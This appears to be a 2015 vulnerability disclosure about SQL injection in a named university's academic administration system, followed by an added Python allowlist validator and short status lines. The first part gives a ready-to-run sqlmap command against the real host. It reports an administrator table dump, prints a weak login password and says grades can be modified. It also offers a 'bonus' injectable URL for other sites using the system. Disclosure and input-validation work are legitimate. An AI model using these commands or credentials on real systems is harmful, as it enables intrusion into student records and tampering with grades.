2015-05-20: Details have been reported to the vendor and are awaiting the vendor's handling.
2015-05-25: The vendor has actively ignored the vulnerability; details are being disclosed to the public.
It appears a superfluous function was left exposed; this vulnerable file was not found at other schools running the same system.
sqlmap -u "http://bkjw.jsnu.edu.cn/other/findmm.aspx" --data "__VIEWSTATE=%2FwEPDwUKMTM3MDMyNTgxMQ9kFgICAw9kFgICCQ8PFgIeBFRleHRlZGRkDT0lfg003PEJouDc7Ib%2FVQuuzVE%3D&__EVENTVALIDATION=%2FwEWBgLj84i4CQLor%2FPuDAL3r%2FPuDAKBmOPQBQKcgYHmDwKM54rGBsV344zSHNaXohGFz7uP0KRd%2FDWW&ddllx=1&tb1=110&tb2=110&Button1=+%D5%D2+%BB%D8+" -p "tb1" --dbs
Since this is an academic administration system, student records are certainly in there; only the administrator table was dumped here.
The password hash wasn't cracked, so I tried a weak password offhand and got in: 182089/182089
Grades can be modified here, but teacher privileges are very limited; it seems only the courses one teaches can be changed.
That's all. As a bonus, here is a generic injection for this system; it requires logging in with a student account.
http://url/JWXS/xsxk/xsxk_zlgl_jstd.aspx?Zj=201420001489&TzdId=201420001489&kcmc=%cf%df%d0%d4%b4%fa%ca%fd&xnxqh=2014-2015-2&kcdm=00250&actionSrc=
The xnxqh parameter has error-based injection, though it isn't of much use.
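Both injection points above (tb1 on findmm.aspx, xnxqh on xsxk_zlgl_jstd.aspx) take values with a fixed, narrow shape, so a server-side allowlist check rejects the tampered requests before they reach the database. The following is an added example written for this page, not code from the report or from the vendor's system; the value shapes are assumptions inferred from the legitimate values shown above (tb1=110, xnxqh=2014-2015-2), and the sample request strings are constructed.

```python
import re
from urllib.parse import parse_qs

# Allowlist patterns for the two injectable parameters named in the report.
# Shapes are assumptions inferred from the legitimate values in the report,
# not taken from the vendor's specification.
PARAM_RULES = {
    "tb1": re.compile(r"\d{1,12}"),            # findmm.aspx: numeric account id
    "xnxqh": re.compile(r"\d{4}-\d{4}-[12]"),  # xsxk_zlgl_jstd.aspx: academic term
}


def violations(encoded: str) -> dict[str, list[str]]:
    """Decode a query string or form body and return, for each watched
    parameter, the decoded values that do not match its allowlist pattern.
    Parameters not listed in PARAM_RULES are left alone."""
    bad: dict[str, list[str]] = {}
    for name, values in parse_qs(encoded, keep_blank_values=True).items():
        rule = PARAM_RULES.get(name)
        if rule is None:
            continue
        rejected = [v for v in values if not rule.fullmatch(v)]
        if rejected:
            bad[name] = rejected
    return bad


def is_clean(encoded: str) -> bool:
    """True when every watched parameter in the request matches its rule."""
    return not violations(encoded)


# Constructed samples: the legitimate shapes from the report, plus a variant
# of each with a stray quote (%27) appended, which the checks must reject.
SAMPLES = {
    "findmm_ok": "ddllx=1&tb1=110&tb2=110",
    "findmm_tampered": "ddllx=1&tb1=110%27&tb2=110",
    "xsxk_ok": "Zj=201420001489&xnxqh=2014-2015-2&kcdm=00250",
    "xsxk_tampered": "Zj=201420001489&xnxqh=2014-2015-2%27&kcdm=00250",
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(label, "clean" if is_clean(sample) else violations(sample))
```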
Same as above
Don't understand at all
Severity: no impact, vendor ignored
Ignored at: 2015-05-25 18:24
None yet